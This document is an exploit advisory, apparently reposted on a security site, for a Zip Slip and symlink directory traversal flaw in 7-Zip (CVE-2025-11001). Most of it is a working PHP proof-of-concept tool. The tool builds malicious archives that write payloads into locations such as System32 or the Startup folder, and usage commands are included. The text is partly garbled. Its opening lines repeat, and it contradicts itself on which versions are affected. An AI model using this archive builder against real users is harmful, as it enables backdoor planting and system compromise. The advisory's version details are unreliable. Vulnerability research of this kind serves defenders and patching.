7-Zip version 25.00 contained a critical Zip Slip vulnerability.
This directory 7-Zip version 25.00 contained a critical Zip Slip vulnerability.
This directory traversal flaw allowed malicious archives to write files outside the intended extraction directory. By crafting filenames with `../` sequences within an archive, an attacker could place arbitrary files in sensitive system locations.
The impact ranged from overwriting critical system files to achieving remote code execution (RCE) on the victim's machine. Users extracting such a specially crafted archive with the vulnerable 7-Zip version were at risk.
The vulnerability was promptly addressed. Users were strongly advised to update to a patched version of 7-Zip to mitigate this risk.
=============================================================================================================================================
| # Title : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.7-zip.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001
[+] Summary :
Multiple archive extraction implementations, including 7?Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
An attacker can craft a malicious ZIP archive containing:
Directory traversal sequences (../../../)
Symlink entries
Manipulated extra fields
Null?byte terminated link targets
This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.
[+] Vulnerability Class :
Directory Traversal
Arbitrary File Write
Symlink Path Injection
Null-byte truncation bug
[+] Affected Software :
7?Zip < 25.00 (Administrator-only exploitation on Windows)
Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)
Applications that use ZipArchive without proper sanitization
[+] Impact
A malicious ZIP archive allows an attacker to place files in arbitrary locations such as
C:\Windows\System32\
C:\ProgramData\Microsoft\Windows\Start Menu\
/etc/
/var/www/html/
[+] Possible consequences:
Backdoor planting
Privilege escalation
Persistence via startup folders
Overwriting sensitive files
Gaining remote execution depending on file location created
[+] Technical Details
[+] Core Exploit Mechanism
The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe
or a symlink entry: evil.lnk ? ../../../../Users/Public/Documents\0
These paths bypass validators in 7?Zip and other ZIP extractors when running with elevated privileges.
poc
<?php
/*
===========================================================
By Indoushka (Nekaa Salah eddine)
===========================================================
*/
/* ===========================================================
MODE 1 ? Basic Zip Slip Exploit
(Former: build_zip duplicated 4 times)
=========================================================== */
function poc_zip_slip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }
$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;
$zip = new ZipArchive();
if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
die("[-] Failed to create ZIP\n");
}
$zip->addFromString($traversal . $payload_name, $payload_data);
$zip->close();
echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
}
/* ===========================================================
MODE 2 ? Manual Symlink ZIP Creator
=========================================================== */
function poc_symlink_zip($target_path, $output_zip)
{
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;
$name = "evil.lnk";
$link = $traversal . "\x00";
$extra = pack("v", 0x756e);
$extra .= pack("v", strlen($link));
$extra .= $link;
$local = pack("VvvvvvVVVvv",
0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
strlen($name), strlen($extra)
);
file_put_contents($output_zip, $local . $name . $extra);
echo "[+] PoC: Symlink ZIP created: $output_zip\n";
}
/* ===========================================================
MODE 3 ? Full Manual ZIP Builder (Symlink + Payload)
=========================================================== */
function poc_manual_zip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }
$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$trav = "../../../../" . $target;
$ln_name = "evil.lnk";
$ln_target = $trav . "\x00";
$ln_extra = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;
$f = fopen($output_zip, "wb");
$off = 0;
// Local: Symlink
$h1 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
);
fwrite($f, $h1.$ln_name.$ln_extra);
$symlink_offset = $off;
$off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);
// Local: Payload
$h2 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
strlen($payload_name),0
);
fwrite($f, $h2.$payload_name.$payload_data);
$payload_offset = $off;
$off += strlen($h2)+strlen($payload_name)+strlen($payload_data);
// Central Directory
$cd_start = $off;
// CD: Symlink
$cd1 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
);
fwrite($f, $cd1.$ln_name.$ln_extra);
// CD: Payload
$cd2 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,
strlen($payload_data),strlen($payload_data),
strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
);
fwrite($f, $cd2.$payload_name);
// EOCD
$eocd = pack("VvvvvVVv",
0x06054b50,0,0,2,2,$off,$cd_start,0
);
fwrite($f, $eocd);
fclose($f);
echo "[+] PoC: Manual ZIP generated: $output_zip\n";
}
/* ===========================================================
MODE 4 ? CVE?2025?11001 (7-Zip Directory Traversal)
=========================================================== */
function poc_cve_2025_11001($target, $payload, $output)
{
poc_manual_zip($target, $payload, $output);
echo "[+] CVE-2025-11001 Archive Ready\n";
}
/* ===========================================================
CLI Controller
=========================================================== */
if (php_sapi_name() == "cli")
{
$args = getopt("", [
"mode:",
"target:",
"payload::",
"output::"
]);
if (!isset($args["mode"])) {
die("Usage:\n
php exploit.php --mode=zip-slip --target=DIR --payload=file --output=out.zip
php exploit.php --mode=symlink --target=DIR --output=out.zip
php exploit.php --mode=manual --target=DIR --payload=file --output=out.zip
php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
");
}
$mode = $args["mode"];
$target = $args["target"] ?? null;
$payload= $args["payload"] ?? null;
$output = $args["output"] ?? "exploit.zip";
switch ($mode) {
case "zip-slip":
poc_zip_slip($target, $payload, $output);
break;
case "symlink":
poc_symlink_zip($target, $output);
break;
case "manual":
poc_manual_zip($target, $payload, $output);
break;
case "cve-2025-11001":
poc_cve_2025_11001($target, $payload, $output);
break;
default:
echo "Unknown mode.\n";
}
}
?>
Save as : poc.php
run : php poc.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
7-Zip 25.00 Zip Slip Directory Traversal
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 154
